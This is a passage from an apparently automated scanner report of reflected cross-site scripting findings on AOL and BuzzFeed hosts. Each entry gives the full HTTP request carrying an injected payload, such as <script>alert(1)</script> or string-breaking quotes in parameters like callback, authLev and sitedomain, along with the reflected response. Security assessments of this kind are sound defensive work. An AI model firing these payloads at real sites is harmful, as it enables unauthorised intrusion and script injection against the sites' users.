<body onLoad="snsInFrameRedir('http://my.screenname.aol.com/_cqr/logout/mcLogout.psp?sitedomain=yellowpages.aol.com&authLev=1d5d86"><a b=c>cedf0535f04&siteState=OrigUrl%3D&lang=en&locale=us');">
...[SNIP]...

5.145. https://my.screenname.aol.com/_cqr/logout/mcLogout.psp [brandless parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	https://my.screenname.aol.com
Path:	/_cqr/logout/mcLogout.psp

Issue detail

The value of the brandless request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 770a0"><a%20b%3dc>5621d33cee7 was submitted in the brandless parameter. This input was echoed as 770a0"><a b=c>5621d33cee7 in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags and attributes into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /_cqr/logout/mcLogout.psp?authLev=0&sitedomain=www.truveo.com&lang=en&locale=us&brandless=1770a0"><a%20b%3dc>5621d33cee7&succUrl= HTTP/1.1
Host: my.screenname.aol.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: RSP_COOKIE=aid=c5999d1676b211e08f73fc32f1f68f78; testcookie=; s_pers=%20s_getnr%3D1304575136213-Repeat%7C1367647136213%3B%20s_nrgvo%3DRepeat%7C1367647136214%3B; CUNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.415b; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; SNS_LDC=1&-&-&1304557177&2&1304557177&0; s_vi=[CS]v1|26D984D8851D3687-40000131C03E6937[CE]; SNS_SC=diAxLjAga2lkIDEgb2s2dGh3MGkyQ2dieDhlMFRpa2NBZXdzMFdVPQ%3D%3D-YYZuBkxMyMWngGYBlf7BBILTSNZE65KcDHQcS%2BDCB4w0mdPurRPtJyvnA0OjYbdsDRnOrht55NnSs0UDFB4dT40NVElma9xb3bh%2BeP7mtSAJ%2BEJEGHzsBOtqDf2bX6EEZhnSXZVU5M1g126ChPANO1DtgqZwo1EklAX2Q%2FaIKHcAR0iw3RMYwg%3D%3D; UNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.415b;

Response

HTTP/1.0 200 OK
Date: Thu, 05 May 2011 01:03:44 GMT
Pragma: No-cache
Cache-Control: no-cache, must-revalidate
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: SNS_SC=diAxLjAga2lkIDEgRjIvZkdPLzQzSGNMU1p4Rk0zZitsc2pwVXZjPQ%3D%3D-UZKm3ggjROk%2FYU1IOZAZBOWS%2Fu5TzvbOC%2B%2Fr4BQv%2BAWPsc5vt%2FGgirdwtWI90VuDvi%2BGx9b%2FCaRZTvjXvERJx9s0BY4nrMuq5Gmq5Sfp70wXKZ4VMMUyiB2RodIaW6s5lj%2FpjhG%2FRZQlo%2FWq6p29yyzwNA6B6FJIwhsTv2MPRNCtiC%2BigA8BcY3LO0lgr8DWmElMFVQpSy0GtXCufQ1VAmBN5Dysu28g; Domain=my.screenname.aol.com; Path=/
Set-Cookie: SNS_LDC=1&-&-&1304557424&0&1304557177&0; Domain=my.screenname.aol.com; Expires=Sat, 04-Jun-2011 01:03:44 GMT; Path=/
Content-Type: text/html;charset=utf-8
Content-Language: en-US
P3P: CP="PHY ONL PRE STA CURi OUR IND"
Content-Length: 1553
Connection: close

<html>
<head>
<LINK href="https://sns-static.aolcdn.com/sns.v11r4/style/snsStyles.css" rel="stylesheet" type="text/css">
<SCRIPT LA
...[SNIP]...
<body onLoad="snsInFrameRedir('http://my.screenname.aol.com/_cqr/logout/mcLogout.psp?sitedomain=www.truveo.com&authLev=0&lang=en&locale=us&brandless=1770a0"><a b=c>5621d33cee7');">
...[SNIP]...

5.146. https://my.screenname.aol.com/badbrowser.psp [authLev parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	https://my.screenname.aol.com
Path:	/badbrowser.psp

Issue detail

The value of the authLev request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2412e"><a%20b%3dc>321d509658 was submitted in the authLev parameter. This input was echoed as 2412e"><a b=c>321d509658 in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags and attributes into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /badbrowser.psp?source=login&sitedomain=startpage.aol.com&siteState=OrigUrl%3dhttp%3a%2f%2fwww.aol.com%2f&authLev=02412e"><a%20b%3dc>321d509658&lang=en&locale=us HTTP/1.1
Host: my.screenname.aol.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: RSP_COOKIE=aid=c5999d1676b211e08f73fc32f1f68f78; testcookie=; s_pers=%20s_getnr%3D1304575136213-Repeat%7C1367647136213%3B%20s_nrgvo%3DRepeat%7C1367647136214%3B; CUNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.415b; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; SNS_LDC=1&-&-&1304557177&2&1304557177&0; s_vi=[CS]v1|26D984D8851D3687-40000131C03E6937[CE]; SNS_SC=diAxLjAga2lkIDEgb2s2dGh3MGkyQ2dieDhlMFRpa2NBZXdzMFdVPQ%3D%3D-YYZuBkxMyMWngGYBlf7BBILTSNZE65KcDHQcS%2BDCB4w0mdPurRPtJyvnA0OjYbdsDRnOrht55NnSs0UDFB4dT40NVElma9xb3bh%2BeP7mtSAJ%2BEJEGHzsBOtqDf2bX6EEZhnSXZVU5M1g126ChPANO1DtgqZwo1EklAX2Q%2FaIKHcAR0iw3RMYwg%3D%3D; UNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.415b;

Response

HTTP/1.0 200 OK
Date: Thu, 05 May 2011 01:03:44 GMT
Pragma: No-cache
Cache-Control: no-cache, must-revalidate
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: SNS_LDC=1&-&-&1304557177&2&1304557177&0; Domain=my.screenname.aol.com; Expires=Sat, 04-Jun-2011 01:03:44 GMT; Path=/
Content-Type: text/html;charset=utf-8
Content-Language: en-US
P3P: CP="PHY ONL PRE STA CURi OUR IND"
Content-Length: 2923
Connection: close

...[SNIP]...
<a href="/_cqr/login/login.psp?sitedomain=startpage.aol.com&authLev=02412e"><a b=c>321d509658&siteState=OrigUrl%3Dhttp%3A%2F%2Fwww.aol.com%2F&lang=en&locale=us">
...[SNIP]...

5.147. https://my.screenname.aol.com/badbrowser.psp [authLev parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	https://my.screenname.aol.com
Path:	/badbrowser.psp

Issue detail

The value of the authLev request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 966c4"%3b53cc90668c2 was submitted in the authLev parameter. This input was echoed as 966c4";53cc90668c2 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Request

GET /badbrowser.psp?source=login&sitedomain=startpage.aol.com&siteState=OrigUrl%3dhttp%3a%2f%2fwww.aol.com%2f&authLev=0966c4"%3b53cc90668c2&lang=en&locale=us HTTP/1.1
Host: my.screenname.aol.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: RSP_COOKIE=aid=c5999d1676b211e08f73fc32f1f68f78; testcookie=; s_pers=%20s_getnr%3D1304575136213-Repeat%7C1367647136213%3B%20s_nrgvo%3DRepeat%7C1367647136214%3B; CUNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.415b; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; SNS_LDC=1&-&-&1304557177&2&1304557177&0; s_vi=[CS]v1|26D984D8851D3687-40000131C03E6937[CE]; SNS_SC=diAxLjAga2lkIDEgb2s2dGh3MGkyQ2dieDhlMFRpa2NBZXdzMFdVPQ%3D%3D-YYZuBkxMyMWngGYBlf7BBILTSNZE65KcDHQcS%2BDCB4w0mdPurRPtJyvnA0OjYbdsDRnOrht55NnSs0UDFB4dT40NVElma9xb3bh%2BeP7mtSAJ%2BEJEGHzsBOtqDf2bX6EEZhnSXZVU5M1g126ChPANO1DtgqZwo1EklAX2Q%2FaIKHcAR0iw3RMYwg%3D%3D; UNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.415b;

Response

HTTP/1.0 200 OK
Date: Thu, 05 May 2011 01:03:45 GMT
Pragma: No-cache
Cache-Control: no-cache, must-revalidate
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: SNS_LDC=1&-&-&1304557177&2&1304557177&0; Domain=my.screenname.aol.com; Expires=Sat, 04-Jun-2011 01:03:45 GMT; Path=/
Content-Type: text/html;charset=utf-8
Content-Language: en-US
P3P: CP="PHY ONL PRE STA CURi OUR IND"
Content-Length: 2911
Connection: close

...[SNIP]...
="sso";
s_265.pageName="sso : badbrowser";
s_265.channel="us.snssignin";
s_265.prop1='ssologin';
s_265.prop12="/snsBadBrowser.jsp";
s_265.prop16="startpage.aol.com";
s_265.prop17="std";
s_265.prop18="0966c4";53cc90668c2";
s_265.prop19="vl6";
s_265.prop20="en-us";
s_265.prop21="AOLPortal";
s_265.prop22=".aol.com";
s_265.prop23="aol-com-jv3-en-us";
s_265.mmxgo=true;
var s_code=s_265.t();
if(s_code)document.write(s_code
...[SNIP]...

5.148. https://my.screenname.aol.com/badbrowser.psp [offerId parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	https://my.screenname.aol.com
Path:	/badbrowser.psp

Issue detail

The value of the offerId request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 73708"%3bca33ab712c1 was submitted in the offerId parameter. This input was echoed as 73708";ca33ab712c1 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Request

GET /badbrowser.psp?source=login&offerId=aol-com-jv3-en-us73708"%3bca33ab712c1&sitedomain=startpage.aol.com&siteState=http://www.aol.com&lang=en&locale=us HTTP/1.1
Host: my.screenname.aol.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: RSP_COOKIE=aid=c5999d1676b211e08f73fc32f1f68f78; testcookie=; s_pers=%20s_getnr%3D1304575136213-Repeat%7C1367647136213%3B%20s_nrgvo%3DRepeat%7C1367647136214%3B; CUNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.415b; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; SNS_LDC=1&-&-&1304557177&2&1304557177&0; s_vi=[CS]v1|26D984D8851D3687-40000131C03E6937[CE]; SNS_SC=diAxLjAga2lkIDEgb2s2dGh3MGkyQ2dieDhlMFRpa2NBZXdzMFdVPQ%3D%3D-YYZuBkxMyMWngGYBlf7BBILTSNZE65KcDHQcS%2BDCB4w0mdPurRPtJyvnA0OjYbdsDRnOrht55NnSs0UDFB4dT40NVElma9xb3bh%2BeP7mtSAJ%2BEJEGHzsBOtqDf2bX6EEZhnSXZVU5M1g126ChPANO1DtgqZwo1EklAX2Q%2FaIKHcAR0iw3RMYwg%3D%3D; UNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.415b;

Response

HTTP/1.0 200 OK
Date: Thu, 05 May 2011 01:03:44 GMT
Pragma: No-cache
Cache-Control: no-cache, must-revalidate
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: SNS_LDC=1&-&-&1304557177&2&1304557177&0; Domain=my.screenname.aol.com; Expires=Sat, 04-Jun-2011 01:03:44 GMT; Path=/
Content-Type: text/html;charset=utf-8
Content-Language: en-US
P3P: CP="PHY ONL PRE STA CURi OUR IND"
Content-Length: 2924
Connection: close

...[SNIP]...
sp";
s_265.prop16="startpage.aol.com";
s_265.prop17="std";
s_265.prop18="1";
s_265.prop19="vl6";
s_265.prop20="en-us";
s_265.prop21="AOLPortal";
s_265.prop22=".aol.com";
s_265.prop23="aol-com-jv3-en-us73708";ca33ab712c1";
s_265.mmxgo=true;
var s_code=s_265.t();
if(s_code)document.write(s_code);
//-->
...[SNIP]...

5.149. https://my.screenname.aol.com/badbrowser.psp [offerId parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	https://my.screenname.aol.com
Path:	/badbrowser.psp

Issue detail

The value of the offerId request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 408b7"><a%20b%3dc>b30f94d299c was submitted in the offerId parameter. This input was echoed as 408b7"><a b=c>b30f94d299c in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags and attributes into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /badbrowser.psp?source=login&offerId=aol-com-jv3-en-us408b7"><a%20b%3dc>b30f94d299c&sitedomain=startpage.aol.com&siteState=http://www.aol.com&lang=en&locale=us HTTP/1.1
Host: my.screenname.aol.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: RSP_COOKIE=aid=c5999d1676b211e08f73fc32f1f68f78; testcookie=; s_pers=%20s_getnr%3D1304575136213-Repeat%7C1367647136213%3B%20s_nrgvo%3DRepeat%7C1367647136214%3B; CUNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.415b; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; SNS_LDC=1&-&-&1304557177&2&1304557177&0; s_vi=[CS]v1|26D984D8851D3687-40000131C03E6937[CE]; SNS_SC=diAxLjAga2lkIDEgb2s2dGh3MGkyQ2dieDhlMFRpa2NBZXdzMFdVPQ%3D%3D-YYZuBkxMyMWngGYBlf7BBILTSNZE65KcDHQcS%2BDCB4w0mdPurRPtJyvnA0OjYbdsDRnOrht55NnSs0UDFB4dT40NVElma9xb3bh%2BeP7mtSAJ%2BEJEGHzsBOtqDf2bX6EEZhnSXZVU5M1g126ChPANO1DtgqZwo1EklAX2Q%2FaIKHcAR0iw3RMYwg%3D%3D; UNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.415b;

Response

HTTP/1.0 200 OK
Date: Thu, 05 May 2011 01:03:43 GMT
Pragma: No-cache
Cache-Control: no-cache, must-revalidate
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: SNS_LDC=1&-&-&1304557177&2&1304557177&0; Domain=my.screenname.aol.com; Expires=Sat, 04-Jun-2011 01:03:44 GMT; Path=/
Content-Type: text/html;charset=utf-8
Content-Language: en-US
P3P: CP="PHY ONL PRE STA CURi OUR IND"
Content-Length: 2938
Connection: close

...[SNIP]...
<a href="/_cqr/login/login.psp?sitedomain=startpage.aol.com&authLev=1&siteState=http%3A%2F%2Fwww.aol.com&lang=en&locale=us&offerId=aol-com-jv3-en-us408b7"><a b=c>b30f94d299c">
...[SNIP]...

5.150. https://my.screenname.aol.com/badbrowser.psp [sitedomain parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	https://my.screenname.aol.com
Path:	/badbrowser.psp

Issue detail

The value of the sitedomain request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ded56"%3b7db10e54842 was submitted in the sitedomain parameter. This input was echoed as ded56";7db10e54842 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Request

GET /badbrowser.psp?source=login&sitedomain=startpage.aol.comded56"%3b7db10e54842&siteState=OrigUrl%3dhttp%3a%2f%2fwww.aol.com%2f&authLev=0&lang=en&locale=us HTTP/1.1
Host: my.screenname.aol.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: RSP_COOKIE=aid=c5999d1676b211e08f73fc32f1f68f78; testcookie=; s_pers=%20s_getnr%3D1304575136213-Repeat%7C1367647136213%3B%20s_nrgvo%3DRepeat%7C1367647136214%3B; CUNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.415b; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; SNS_LDC=1&-&-&1304557177&2&1304557177&0; s_vi=[CS]v1|26D984D8851D3687-40000131C03E6937[CE]; SNS_SC=diAxLjAga2lkIDEgb2s2dGh3MGkyQ2dieDhlMFRpa2NBZXdzMFdVPQ%3D%3D-YYZuBkxMyMWngGYBlf7BBILTSNZE65KcDHQcS%2BDCB4w0mdPurRPtJyvnA0OjYbdsDRnOrht55NnSs0UDFB4dT40NVElma9xb3bh%2BeP7mtSAJ%2BEJEGHzsBOtqDf2bX6EEZhnSXZVU5M1g126ChPANO1DtgqZwo1EklAX2Q%2FaIKHcAR0iw3RMYwg%3D%3D; UNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.415b;

Response

HTTP/1.0 200 OK
Date: Thu, 05 May 2011 01:03:44 GMT
Pragma: No-cache
Cache-Control: no-cache, must-revalidate
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: SNS_LDC=1&-&-&1304557177&2&1304557177&0; Domain=my.screenname.aol.com; Expires=Sat, 04-Jun-2011 01:03:44 GMT; Path=/
Content-Type: text/html;charset=utf-8
Content-Language: en-US
P3P: CP="PHY ONL PRE STA CURi OUR IND"
Content-Length: 2826
Connection: close

...[SNIP]...
r="my.screenname.aol.com";
s_265.pfxID="sso";
s_265.pageName="sso : badbrowser";
s_265.channel="us.snssignin";
s_265.prop1='ssologin';
s_265.prop12="/snsBadBrowser.jsp";
s_265.prop16="startpage.aol.comded56";7db10e54842";
s_265.prop17="std";
s_265.prop18="0";
s_265.prop19="wa3";
s_265.prop20="en-us";
s_265.mmxgo=true;
var s_code=s_265.t();
if(s_code)document.write(s_code);
//-->
...[SNIP]...

5.151. https://my.screenname.aol.com/badbrowser.psp [sitedomain parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	https://my.screenname.aol.com
Path:	/badbrowser.psp

Issue detail

The value of the sitedomain request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c9eaa"><a>2d990b897f5 was submitted in the sitedomain parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /badbrowser.psp?source=login&sitedomain=startpage.aol.comc9eaa"><a>2d990b897f5&siteState=OrigUrl%3dhttp%3a%2f%2fwww.aol.com%2f&authLev=0&lang=en&locale=us HTTP/1.1
Host: my.screenname.aol.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: RSP_COOKIE=aid=c5999d1676b211e08f73fc32f1f68f78; testcookie=; s_pers=%20s_getnr%3D1304575136213-Repeat%7C1367647136213%3B%20s_nrgvo%3DRepeat%7C1367647136214%3B; CUNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.415b; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; SNS_LDC=1&-&-&1304557177&2&1304557177&0; s_vi=[CS]v1|26D984D8851D3687-40000131C03E6937[CE]; SNS_SC=diAxLjAga2lkIDEgb2s2dGh3MGkyQ2dieDhlMFRpa2NBZXdzMFdVPQ%3D%3D-YYZuBkxMyMWngGYBlf7BBILTSNZE65KcDHQcS%2BDCB4w0mdPurRPtJyvnA0OjYbdsDRnOrht55NnSs0UDFB4dT40NVElma9xb3bh%2BeP7mtSAJ%2BEJEGHzsBOtqDf2bX6EEZhnSXZVU5M1g126ChPANO1DtgqZwo1EklAX2Q%2FaIKHcAR0iw3RMYwg%3D%3D; UNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.415b;

Response

HTTP/1.0 200 OK
Date: Thu, 05 May 2011 01:03:43 GMT
Pragma: No-cache
Cache-Control: no-cache, must-revalidate
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: SNS_LDC=1&-&-&1304557177&2&1304557177&0; Domain=my.screenname.aol.com; Expires=Sat, 04-Jun-2011 01:03:43 GMT; Path=/
Content-Type: text/html;charset=utf-8
Content-Language: en-US
P3P: CP="PHY ONL PRE STA CURi OUR IND"
Content-Length: 2832
Connection: close

...[SNIP]...
<a href="/_cqr/login/login.psp?sitedomain=startpage.aol.comc9eaa"><a>2d990b897f5&authLev=0&siteState=OrigUrl%3Dhttp%3A%2F%2Fwww.aol.com%2F&lang=en&locale=us">
...[SNIP]...

5.152. http://o.aolcdn.com/smartbox/SBG/REST/ [callback parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://o.aolcdn.com
Path:	/smartbox/SBG/REST/

Issue detail

The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload 5ede4<script>alert(1)</script>239d61e336 was submitted in the callback parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /smartbox/SBG/REST/?f=json&c=11&fids=n,sn,en,e,cc,t&service=SmartBoxQuotes&t=all&callback=processSBJSON5ede4<script>alert(1)</script>239d61e336 HTTP/1.1
Host: o.aolcdn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Type: text/javascript;charset=UTF-8
Cache-Control: max-age=3600
Expires: Thu, 05 May 2011 14:04:36 GMT
Date: Thu, 05 May 2011 13:04:36 GMT
Content-Length: 55
Connection: close

processSBJSON5ede4<script>alert(1)</script>239d61e336()

5.153. http://pglb.buzzfed.com/10032/f4f3ccafe3fc01872a82127ebf3deddd [callback parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://pglb.buzzfed.com
Path:	/10032/f4f3ccafe3fc01872a82127ebf3deddd

Issue detail

The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload 21ff9<script>alert(1)</script>28fc23c1688 was submitted in the callback parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /10032/f4f3ccafe3fc01872a82127ebf3deddd?callback=BF_PARTNER.gate_response21ff9<script>alert(1)</script>28fc23c1688&cb=2731 HTTP/1.1
Host: pglb.buzzfed.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/javascript; charset=ISO-8859-1
Server: lighttpd
Content-Length: 79
Cache-Control: max-age=604800
Expires: Thu, 12 May 2011 01:00:40 GMT
Date: Thu, 05 May 2011 01:00:40 GMT
Connection: close

BF_PARTNER.gate_response21ff9<script>alert(1)</script>28fc23c1688(1304530525);

5.154. http://portal.pf.aol.com/jsonmfus/ws [callback parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://portal.pf.aol.com
Path:	/jsonmfus/ws

Issue detail

The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload 228b8<script>alert(1)</script>03e62d5cb67 was submitted in the callback parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /jsonmfus/ws?service=symslist,markets&symbols=E:DJI:$INDU,E:NAI:$COMPX,E:CMI:$INX,E:BSS:(TC10Y,E:ISE:UKX,E:FX1:N225,E:FX1:HSIX,E:FX1:EURUSD,E:FX1:USDJPY,E:DEI:DAX,E:FX1:GBPUSD,E:FX1:USDCHF,E:CMX:/GC\M11,E:NYM:/CL\M11,E:NYM:/NG\N11,E:NYM:/PL\N11,E:NYS:C,E:NYS:SLV,NYS:SPY,E:NYS:BAC,E:NYS:RENN,E:NYS:BKS,NYS:TMH,E:NYS:HPY,E:NYS:CPF.RT,E:NYS:KV.B,NYS:DVR,E:NYS:KV.A&porttype=2&portmax=100&callback=rebuildLiveHash228b8<script>alert(1)</script>03e62d5cb67&rf=http://www.dailyfinance.com HTTP/1.1
Host: portal.pf.aol.com
Proxy-Connection: keep-alive
Referer: http://www.dailyfinance.com/?icid=navbar_finance_main5
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26D984D8851D3687-40000131C03E6937[CE]; s_pers=%20s_getnr%3D1304575100634-Repeat%7C1367647100634%3B%20s_nrgvo%3DRepeat%7C1367647100636%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; RSP_COOKIE=aid=c5999d1676b211e08f73fc32f1f68f78; UNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.415b; CUNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.415b

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 00:59:20 GMT
Server: Apache
Pragma: no-cache
Cache-Control: no-store, no-cache, max-age=0, must-revalidate, proxy-revalidate, no-transform
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: text/javascript;charset=utf-8
Content-Length: 16480

rebuildLiveHash228b8<script>alert(1)</script>03e62d5cb67({"ResultSet": {
"symslist": [
{
"lu": "http://www.dailyfinance.com/quotes/dow-jones-industrial-average/%24indu/dji",
"c": "-83.93",
"xdn": "DJ Index",
"p": "12,723.58",
"pc": "-0.66"
...[SNIP]...

5.155. http://portal.pf.aol.com/jsonqpus/ws [callback parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://portal.pf.aol.com
Path:	/jsonqpus/ws

Issue detail

The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload 186a5<script>alert(1)</script>ee3f8d1bcc6 was submitted in the callback parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /jsonqpus/ws?service=futures,&exchange=&symbols=&futurestype=2&futureskeyword=NYMEX_GOLD_FUTURES,NYMEX_CRUDE_FUTURES,NYMEX_NATURAL_GAS_FUTURES,NYMEX_PLATINUM_FUTURES,&futuresmax=1&callback=jQuery1509592739215586334_1304575094374186a5<script>alert(1)</script>ee3f8d1bcc6 HTTP/1.1
Host: portal.pf.aol.com
Proxy-Connection: keep-alive
Referer: http://www.dailyfinance.com/?icid=navbar_finance_main5
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26D984D8851D3687-40000131C03E6937[CE]; UNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.415b; CUNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.415b; s_pers=%20s_getnr%3D1304575091494-Repeat%7C1367647091494%3B%20s_nrgvo%3DRepeat%7C1367647091495%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 00:59:18 GMT
Server: Apache
Pragma: no-cache
Cache-Control: no-store, no-cache, max-age=0, must-revalidate, proxy-revalidate, no-transform
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Length: 1456
Content-Type: text/javascript;charset=utf-8

jQuery1509592739215586334_1304575094374186a5<script>alert(1)</script>ee3f8d1bcc6({"ResultSet": {"futures": [
{
"lu": "http://www.dailyfinance.com/quotes/gold-futures-jun-2011-composite/%252fgc%5cm11/cmx",
"xcntrc": "USA",
"t": "STOCK",
"xdn": "COMEX",
"xcntr": "USA",

...[SNIP]...

5.156. http://portalblog.aol.com/2011/02/01/aol-across-the-web-and-beyond/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://portalblog.aol.com
Path:	/2011/02/01/aol-across-the-web-and-beyond/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ba9f0"-alert(1)-"394da22382f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /2011/02/01/aol-across-the-web-and-beyond/?ba9f0"-alert(1)-"394da22382f=1 HTTP/1.1
Host: portalblog.aol.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 10:53:58 GMT
